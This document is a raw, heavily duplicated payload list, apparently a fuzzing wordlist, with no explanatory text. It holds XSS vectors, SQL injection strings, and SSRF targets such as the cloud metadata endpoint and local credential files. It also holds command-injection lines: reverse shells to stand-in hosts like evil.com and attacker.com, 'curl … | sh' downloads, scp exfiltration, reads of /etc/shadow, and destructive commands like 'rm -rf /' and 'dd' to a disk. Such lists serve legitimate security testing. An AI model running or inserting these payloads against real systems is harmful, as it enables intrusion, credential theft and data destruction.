http://localhost/secret,
$(bash -i >& /dev/tcp/evil.com/1234 0>&1),
http://127.1/,
' AND 1=0 UNION ALL SELECT NULL--
' or '1'='1'--,
&& curl evil.com,
<img src='' onerror='eval("alert(1)")'>,
<img src='' onerror='eval("alert(1)")'>,
`curl -s http://evil.com/shell.sh | sh`,
& cat /etc/passwd,
'><body onload=alert(1)>,
'; DROP TABLE users; --,
<isindex prompt='><script>alert(1)</script>'>,
<base href='javascript:alert(1)//'>,
http://127.0.0.1:8081/,
javascript:alert(1),
; nc attacker.com 1337 -e /bin/bash,
`cat /etc/shadow`,
<a href=javascript&colon;alert(1)>click</a>,
file:///etc/passwd,
$(id),
<img src=x onerror=alert(1)>,
`touch hacked.txt`,
<img onerror=confirm(1) src=x>
<button onclick=alert(1)>X</button>,
'><body onload=alert(1)>,
<script/src='//xss.rocks/xss.js'>,
<isindex prompt='><script>alert(1)</script>'>,
$(bash -i >& /dev/tcp/evil.com/1234 0>&1),
"><script>alert(document.cookie)</script>,
http://localhost:8080,
`exec ls`,
http://localhost:80/admin,
<b onmouseover=alert(1)>X</b>,
`perl -e 'print qx/id/'`,
http://localhost/.env,
<img onerror=confirm(1) src=x>
`eval ls`,
`ls /root/`,
`shutdown -h now`,
http://127.0.0.1:5000/debug,
' or 1=convert(int,'a') --,
<script>alert(1)</script>,
http://localhost/.aws/credentials,
' AND 1=UTL_INADDR.get_host_name('127.0.0.1')--,
<script/src='//xss.rocks/xss.js'>,
<link rel=stylesheet href=javascript:alert(1)>,
javascript:alert(1),
<embed src=javascript:alert(1)>,
http://[::1]/,
`touch /tmp/hacked`,
&& curl evil.com,
<script src=data:text/javascript,alert(1)></script>,
<details open ontoggle=alert(1)>,
' or 1=convert(int,'a') --,
<input autofocus onfocus=alert(1)>,
`perl -e 'exec "id"'`,
`id; uname -a`,
1' or 1=1#,
$(bash -i >& /dev/tcp/evil.com/1234 0>&1),
`dd if=/dev/zero of=/dev/sda`,
'||(SELECT user FROM dual)--,
`nc -e /bin/sh attacker.com 4444`,
1 AND (SELECT SUBSTRING(@@version,1,1))='5',
`shutdown -h now`,
<object data=javascript:alert(1)>,
' and ascii(substr(database(),1,1))=100 --,
http://internal-api/,
><script>alert(1337)</script>,
' AND 1=(SELECT COUNT(*) FROM users);--,
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==,
' OR 1=1;#,
' AND 1=UTL_INADDR.get_host_name('127.0.0.1')--,
' OR 1 GROUP BY CONCAT(username,password) --,
`env`,
' UNION SELECT NULL, version()--,
<iframe src=javascript:alert(1)>,
<video><source onerror="alert(1)">,
' OR 1 GROUP BY CONCAT(username,password) --,
file:///etc/passwd,
http://localhost/.env,
http://localhost:3000/api,
http://localhost:11211/stats,
<meta http-equiv='refresh' content='0;url=javascript:alert(1)'>,
`touch /tmp/hacked`,
& cat /etc/passwd,
`scp file user@attacker:/tmp`,
`curl -s http://evil.com/shell.sh | sh`,
'=' OR 1=1--,
`id`,
' or 'x'='x,
<img onerror=confirm(1) src=x>
; whoami,
http://internal.corp/api,
1 AND (SELECT SUBSTRING(@@version,1,1))='5',
<img src=x onerror=alert(1)>,
`reboot`,
http://192.168.0.1:8080,
`rm -rf /`,
`uname -a`,
<button onclick=alert(1)>X</button>,
' and (select count(*) from tab)=1 --,
`cat /etc/shadow`,
' or benchmark(1000000,MD5(1))--,
' AND EXISTS(SELECT * FROM users)--,
<video><source onerror="alert(1)">,
'; EXEC xp_cmdshell('whoami'); --,
http://127.0.0.1:22,
'||(SELECT user FROM dual)--,
<svg/onload=alert('xss')>
http://localhost:8000/.git/config,
; nc attacker.com 1337 -e /bin/bash,
`echo hello`,
| ls -la,
1' or 1=1#,
' or '1'='1'--,
http://evil.com/redirect?target=127.0.0.1,
http://169.254.169.254/latest/meta-data/,
<form onsubmit=alert(1)><input type=submit>,
http://0x7f000001/,
& cat /etc/passwd,
' AND EXISTS(SELECT * FROM users)--,
<input onblur=alert(1) autofocus>,
';select 1 where 1=1--,
<b onmouseover=alert(1)>X</b>,
`touch hacked.txt`,
http://localhost:80/admin,
`whoami`,
admin'--,
`mkfifo /tmp/x; nc attacker.com 4444 < /tmp/x | /bin/sh > /tmp/x`,
' UNION SELECT NULL, version()--,
http://10.0.0.1/api,
' and (select count(*) from tab)=1 --,
`rm -rf /`,
admin'--,
; php -r 'system("id");',
http://192.168.0.1:8080,
http://localhost/.env,
http://192.168.1.1/api,
http://internal-api/,
<form onsubmit=alert(1)><input type=submit>,
<form onsubmit=alert(1)><input type=submit>,
$(id),
' and ascii(substr(database(),1,1))=100 --,
http://192.168.1.1/api,
http://admin:admin@127.0.0.1/,
`python3 -c 'import os;os.system("id")'`,
http://127.0.0.1:6379/,
`eval ls`,
`wget http://malicious.site`,
`whoami`,
`id`,
' OR 1=1 --,
' or 1=1 limit 1; --,
<math><mtext></mtext><mo></mo><mi>x</mi><malignmark></malignmark></math><script>alert(1)</script>,
' OR ''=',
http://127.1/,
' or benchmark(1000000,MD5(1))--,
| ls -la,
ftp://127.0.0.1/,
<a href='javascript:alert(1)'>click</a>,
http://127.0.0.1:3306,
http://(::ffff:127.0.0.1]/,
http://127.0.0.1:5000/debug,
`touch /tmp/hacked`,
http://localhost/.aws/credentials,
file://c:/windows/system32/drivers/etc/hosts,
`dd if=/dev/zero of=/dev/sda`,
' AND 1=CAST((SELECT @@version) AS INT);--,
' or exists(select * from users) --,
<embed src=javascript:alert(1)>,
gopher://127.0.0.1:11211/_stats,
<img src=x onerror=alert(1)>,
`whoami`,
`reboot`,
' OR 'a'='a,
`scp file user@attacker:/tmp`,
`mkfifo /tmp/x; nc attacker.com 4444 < /tmp/x | /bin/sh > /tmp/x`,
ftp://127.0.0.1/,
%3Cscript%3Ealert(1)%3C%2Fscript%3E,
http://127.0.0.1:5000/debug,
<img src='x' onerror='alert("XSS")'>,
http://127.0.0.1:80,
<a href='javascript:alert(1)'>click</a>,
`id; uname -a`,
"><script>alert(document.cookie)</script>,
' or false--,
' UNION SELECT NULL, version()--,
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==,
<style>body{background:url(javascript:alert(1))}</style>,
http://internal-api/,
`touch hacked.txt`,
http://localhost/.aws/credentials,
`python3 -c 'import os;os.system("id")'`,
`eval ls`,
`id; uname -a`,
http://127.0.0.1/admin/api,
http://localhost/secret,
http://localhost/secret,
http://localhost:8000/.git/config,
<iframe src=javascript:alert(1)>,
' AND 1=0 UNION ALL SELECT NULL--
'=' OR 1=1--,
http://localhost/?url=http://evil.com,
`python3 -m http.server`,
`nc -e /bin/sh attacker.com 4444`,
'; DROP TABLE users; --,
http://127.0.0.1/cgi-bin/test.cgi,
http://127.0.0.1:9000/.git,
http://localhost/.aws/credentials,
' AND 1=CAST((SELECT @@version) AS INT);--,
$(ping -c 1 attacker.com),
' OR 1=1#,
`reboot`,
gopher://127.0.0.1:11211/_stats,
<link rel=stylesheet href=javascript:alert(1)>,
`exec ls`,
'><body onload=alert(1)>,
"><script>alert(document.cookie)</script>,
<marquee><h1>XSS</h1></marquee>,
`echo vulnerable`,
`cat /etc/shadow`,
file:///windows/win.ini,
';select pg_sleep(10)--,
`shutdown -h now`,
<img src=`~` onerror=alert(1)>,
' OR sleep(5)--,
$(python -c 'import os;os.system("id")'),
" OR 1=1--,
<img onerror=confirm(1) src=x>
`echo vulnerable`,
`system('id')`
<!--<img src=-- onerror=alert(1)>-->,
' or 1=convert(int,'a') --,
http://evil.com/redirect?target=127.0.0.1,
'; EXEC xp_cmdshell('whoami'); --,
'--,
http://evil.com/redirect?target=127.0.0.1,
; php -r 'system("id");',
http://admin:admin@127.0.0.1/,
$(id),
<meta charset='x' /><script>alert(1)</script>,
`perl -e 'exec "id"'`,
1 AND (SELECT SUBSTRING(@@version,1,1))='5',
http://192.168.0.1:8080,
' OR 1 GROUP BY CONCAT(username,password) --,
http://localhost/?url=http://evil.com,
http://(::ffff:127.0.0.1]/,
http://2130706433
' OR 1=1#,
'||(SELECT user FROM dual)--,
'=' OR 1=1--,
<input autofocus onfocus=alert(1)>,
'';!--"<XSS>=&{()},
' AND EXISTS(SELECT * FROM users)--,
' or benchmark(1000000,MD5(1))--,
http://0x7f000001/,
" OR 1=1--,
<svg/onload=alert('xss')>
http://localhost:8080,
'||(SELECT user FROM dual)--,
`python3 -c 'import os;os.system("id")'`,
http://192.168.1.1/api,
http://0x7f000001/,
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==,
' or exists(select * from users) --,
http://localhost/.env,
<iframe src=javascript:alert(1)>,
admin'--,
<script/src='//xss.rocks/xss.js'>,
' AND 1=(SELECT COUNT(*) FROM users);--,
><script>alert(1337)</script>,
1';shutdown--,
<input onblur=alert(1) autofocus>,
<img src=x onerror=alert(1)>,
`wget http://malicious.site`,
<isindex prompt='><script>alert(1)</script>'>,
<a href=javascript&colon;alert(1)>click</a>,
<meta http-equiv='refresh' content='0;url=javascript:alert(1)'>,
http://localhost:8080,
' OR 1=1 --,
' and 1 in (select min(username) from users) --,
' AND EXISTS(SELECT * FROM users)--,
<object data=javascript:alert(1)>,
<meta http-equiv='refresh' content='0;url=javascript:alert(1)'>,
http://internal.corp/api,
';select 1 where 1=1--,
'--,
<object data=javascript:alert(1)>,
<meta charset='x' /><script>alert(1)</script>,
'; waitfor delay '0:0:5' --,
gopher://127.0.0.1:11211/_stats,
http://admin:admin@127.0.0.1/,
' OR sleep(5)--,
<img src=`~` onerror=alert(1)>,
http://127.0.0.1:80,
'--,
http://(::ffff:127.0.0.1]/,
http://127.0.0.1:3306,
http://localhost:8000/.git/config,
'; DROP TABLE users; --,
http://localhost/secret,
' or benchmark(1000000,MD5(1))--,
' or exists(select * from users) --,
<b onmouseover=alert(1)>X</b>,
http://internal.service.local/,
http://2130706433
' OR '' = ',
http://localhost/?url=http://evil.com,
' AND 1=UTL_INADDR.get_host_name('127.0.0.1')--,
`dd if=/dev/zero of=/dev/sda`,
1';shutdown--,
http://127.0.0.1/cgi-bin/test.cgi,
http://[::1]/,
' OR 'a'='a,
<form onsubmit=alert(1)><input type=submit>,
http://internal.corp/api,
' or exists(select * from users) --,
`uname -a`,
http://127.0.0.1/cgi-bin/test.cgi,
<marquee><h1>XSS</h1></marquee>,
`env`,
`rm -rf /`,
http://192.168.0.1:8080,
`wget http://malicious.site`,
`uname -a`,
http://127.0.0.1:80,
<input autofocus onfocus=alert(1)>,
<base href='javascript:alert(1)//'>,
http://internal.corp/api,
`perl -e 'print qx/id/'`,
' or 1=1 limit 1; --,
`ls /root/`,
javascript:alert(1),
<script src=data:text/javascript,alert(1)></script>,
http://127.0.0.1/admin/api,
http://127.0.0.1:5601,
`id`,
'; waitfor delay '0:0:5' --,
<details open ontoggle=alert(1)>,
http://127.0.0.1:3306,
';select pg_sleep(10)--,
http://0.0.0.0:8000,
`ls /root/`,
http://127.0.0.1/admin/api,
' and ascii(substr(database(),1,1))=100 --,
; nc attacker.com 1337 -e /bin/bash,
' and ascii(substr(database(),1,1))=100 --,
http://127.0.0.1:5601,
file:///etc/passwd,
|| sleep 10,
1' or 1=1#,
`nc -e /bin/sh attacker.com 4444`,
|| sleep 10,
'; EXEC xp_cmdshell('whoami'); --,
`system('id')`
`perl -e 'exec "id"'`,
' or true--,
<details open ontoggle=alert(1)>,
' OR updatexml(1,concat(0x7e,user()),0)--,
<img src='x' onerror='alert("XSS")'>,
' AND 1=0 UNION ALL SELECT NULL--
' OR 1=1 LIMIT 1 OFFSET 1 --,
http://evil.com/redirect?target=127.0.0.1,
$(id),
`rm -rf /`,
file://c:/windows/system32/drivers/etc/hosts,
http://169.254.169.254/latest/meta-data/,
http://2130706433
" OR 1=1--,
' OR 1=1;#,
' OR '' = ',
http://127.1/,
http://127.0.0.1:80,
<style>@keyframes x{}</style><div style='animation-name:x' onanimationstart='alert(1)'>,
http://localhost:3000/api,
'; EXEC xp_cmdshell('whoami'); --,
http://127.0.0.1:5601,
';select 1 where 1=1--,
1' or sleep(5)--,
http://0.0.0.0:8000,
http://169.254.169.254/latest/meta-data/,
' AND 1=(SELECT COUNT(*) FROM users);--,
<object data=javascript:alert(1)>,
`python3 -m http.server`,
http://localhost:11211/stats,
`echo hello`,
<a href=javascript&colon;alert(1)>click</a>,
'';!--"<XSS>=&{()},
`perl -e 'exec "id"'`,
<img src='x' onerror='alert("XSS")'>,
$(ping -c 1 attacker.com),
<svg/onload=alert('xss')>
<video><source onerror="alert(1)">,
`python3 -m http.server`,
<style>body{background:url(javascript:alert(1))}</style>,
' or 'x'='x,
`echo hello`,
http://0x7f000001/,
' OR sleep(5)--,
<script src=data:text/javascript,alert(1)></script>,
' OR 1=1 LIMIT 1 OFFSET 1 --,
http://2130706433
' or true--,
<style>body{background:url(javascript:alert(1))}</style>,
<script>alert(1)</script>,
<link rel=stylesheet href=javascript:alert(1)>,
'; waitfor delay '0:0:5' --,
' OR 'a'='a,
1';shutdown--,
`python3 -m http.server`,
<script>alert(1)</script>,
http://internal-api/,
`echo vulnerable`,
<link rel=stylesheet href=javascript:alert(1)>,
<input onblur=alert(1) autofocus>,
<!--<img src=-- onerror=alert(1)>-->,
`exec ls`,
http://internal.service.local/,
`env`,
' OR 'a'='a,
http://169.254.169.254/latest/meta-data/,
http://localhost:80/admin,
<a href=javascript&colon;alert(1)>click</a>,
http://10.0.0.1/api,
http://localhost:8080,
http://127.0.0.1:3306,
`id; uname -a`,
'';!--"<XSS>=&{()},
<!--<img src=-- onerror=alert(1)>-->,
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==,
`perl -e 'print qx/id/'`,
; nc attacker.com 1337 -e /bin/bash,
' and 1 in (select min(username) from users) --,
javascript:alert(1),
1';shutdown--,
http://10.0.0.1/api,
file:///windows/win.ini,
admin'--,
; whoami,
; php -r 'system("id");',
' OR ''=',
file:///etc/passwd,
http://localhost:3000/api,
';select 1 where 1=1--,
<math><mtext></mtext><mo></mo><mi>x</mi><malignmark></malignmark></math><script>alert(1)</script>,
' OR sleep(5)--,
http://localhost:11211/stats,
<marquee><h1>XSS</h1></marquee>,
'; DROP TABLE users; --,
' OR 1=1#,
<svg/onload=alert('xss')>
' OR 1 GROUP BY CONCAT(username,password) --,
1 AND (SELECT SUBSTRING(@@version,1,1))='5',
|| sleep 10,
http://[::1]/,
<base href='javascript:alert(1)//'>,
<script/src='//xss.rocks/xss.js'>,
http://10.0.0.1/api,
' OR '' = ',
gopher://127.0.0.1:11211/_stats,
' OR 1=1 LIMIT 1 OFFSET 1 --,
http://127.0.0.1:22,
<math><mtext></mtext><mo></mo><mi>x</mi><malignmark></malignmark></math><script>alert(1)</script>,
' or '1'='1'--,
`cat /etc/shadow`,
`curl -s http://evil.com/shell.sh | sh`,
`curl -s http://evil.com/shell.sh | sh`,
$(ping -c 1 attacker.com),
' AND 1=UTL_INADDR.get_host_name('127.0.0.1')--,
http://admin:admin@127.0.0.1/,
' OR 1=1 --,
' OR updatexml(1,concat(0x7e,user()),0)--,
<!--<img src=-- onerror=alert(1)>-->,
<script>alert(1)</script>,
http://127.0.0.1:6379/,
`perl -e 'print qx/id/'`,
' or 1=convert(int,'a') --,
" OR 1=1--,
' or 1=1 limit 1; --,
<style>body{background:url(javascript:alert(1))}</style>,
file:///windows/win.ini,
<style>@keyframes x{}</style><div style='animation-name:x' onanimationstart='alert(1)'>,
1' or sleep(5)--,
'=' OR 1=1--,
`scp file user@attacker:/tmp`,
file:///windows/win.ini,
`shutdown -h now`,
`env`,
<script src=data:text/javascript,alert(1)></script>,
`ls /root/`,
`exec ls`,
`scp file user@attacker:/tmp`,
<b onmouseover=alert(1)>X</b>,
`reboot`,
' and (select count(*) from tab)=1 --,
file://c:/windows/system32/drivers/etc/hosts,
<img src=`~` onerror=alert(1)>,
' OR ''=',
http://127.0.0.1:8081/,
<style>@keyframes x{}</style><div style='animation-name:x' onanimationstart='alert(1)'>,
' OR 1=1;#,
' AND 1=(SELECT COUNT(*) FROM users);--,
<marquee><h1>XSS</h1></marquee>,
$(ping -c 1 attacker.com),
<math><mtext></mtext><mo></mo><mi>x</mi><malignmark></malignmark></math><script>alert(1)</script>,
<img src=`~` onerror=alert(1)>,
`uname -a`,
<input onblur=alert(1) autofocus>,
' and (select count(*) from tab)=1 --,
<embed src=javascript:alert(1)>,
; whoami,
' OR 1=1;#,
&& curl evil.com,
<meta http-equiv='refresh' content='0;url=javascript:alert(1)'>,
admin' or '1'='1,
<style>@keyframes x{}</style><div style='animation-name:x' onanimationstart='alert(1)'>,
<iframe src=javascript:alert(1)>,
http://0.0.0.0:8000,
ftp://127.0.0.1/,
`whoami`,
' or 'x'='x,
`python3 -c 'import os;os.system("id")'`,
1' or sleep(5)--,
%3Cscript%3Ealert(1)%3C%2Fscript%3E,
http://internal.service.local/,
<button onclick=alert(1)>X</button>,
admin' or '1'='1,
`system('id')`
'><body onload=alert(1)>,
http://0.0.0.0:8000,
' and 1 in (select min(username) from users) --,
http://192.168.1.1/api,
' or 1=1 limit 1; --,
<button onclick=alert(1)>X</button>,
' OR 1=1#,
http://127.0.0.1:6379/,
<img src=x:alert(1)>,
' OR 1=1 --,
' OR 1=1 LIMIT 1 OFFSET 1 --,
' OR ''=',
><script>alert(1337)</script>,
' or '1'='1'--,
<embed src=javascript:alert(1)>,
'';!--"<XSS>=&{()},
';select pg_sleep(10)--,
http://localhost:11211/stats,
http://127.0.0.1:6379/,
http://127.0.0.1:5000/debug,
<img src=x:alert(1)>,
<a href='javascript:alert(1)'>click</a>,
& cat /etc/passwd,
' AND 1=CAST((SELECT @@version) AS INT);--,
`dd if=/dev/zero of=/dev/sda`,
`system('id')`
http://127.0.0.1:8081/,
' OR updatexml(1,concat(0x7e,user()),0)--,
'; waitfor delay '0:0:5' --,
http://127.0.0.1:9000/.git,
; whoami,
'--,
<a href='javascript:alert(1)'>click</a>,
' OR updatexml(1,concat(0x7e,user()),0)--,
$(python -c 'import os;os.system("id")'),
<video><source onerror="alert(1)">,
' AND 1=0 UNION ALL SELECT NULL--
`mkfifo /tmp/x; nc attacker.com 4444 < /tmp/x | /bin/sh > /tmp/x`,
`mkfifo /tmp/x; nc attacker.com 4444 < /tmp/x | /bin/sh > /tmp/x`,
`eval ls`,
$(python -c 'import os;os.system("id")'),
| ls -la,
<isindex prompt='><script>alert(1)</script>'>,
http://127.0.0.1:22,
' or false--,
' or false--,
|| sleep 10,
admin' or '1'='1,
| ls -la,
<img src='' onerror='eval("alert(1)")'>,
http://localhost:3000/api,
<img src='' onerror='eval("alert(1)")'>,
1' or 1=1#,
http://[::1]/,
`wget http://malicious.site`,
1' or sleep(5)--,
http://internal.service.local/,
%3Cscript%3Ealert(1)%3C%2Fscript%3E,
http://127.1/,
<img src=x:alert(1)>,
' AND 1=CAST((SELECT @@version) AS INT);--,
<img src=x:alert(1)>,
`nc -e /bin/sh attacker.com 4444`,
' UNION SELECT NULL, version()--,
http://localhost:80/admin,
; php -r 'system("id");',
' OR '' = ',
';select pg_sleep(10)--,
' and 1 in (select min(username) from users) --,
http://127.0.0.1:9000/.git,
`touch /tmp/hacked`,
http://127.0.0.1:5601,
%3Cscript%3Ealert(1)%3C%2Fscript%3E,
`echo vulnerable`,
http://localhost:8000/.git/config,
`id`,
ftp://127.0.0.1/,
http://127.0.0.1:8081/,
http://127.0.0.1:22,
http://127.0.0.1:9000/.git,
$(bash -i >& /dev/tcp/evil.com/1234 0>&1),
`echo hello`,
' or 'x'='x,
<img src='x' onerror='alert("XSS")'>,
' or true--,
<base href='javascript:alert(1)//'>,
admin' or '1'='1,
http://127.0.0.1/cgi-bin/test.cgi,
`touch hacked.txt`,
file://c:/windows/system32/drivers/etc/hosts,
"><script>alert(document.cookie)</script>,
<input autofocus onfocus=alert(1)>,
http://(::ffff:127.0.0.1]/,
&& curl evil.com,
<meta charset='x' /><script>alert(1)</script>,
<details open ontoggle=alert(1)>,
' or true--,
<meta charset='x' /><script>alert(1)</script>,
http://127.0.0.1/admin/api,
' or false--,
http://localhost/?url=http://evil.com,
$(python -c 'import os;os.system("id")'),
><script>alert(1337)</script>,
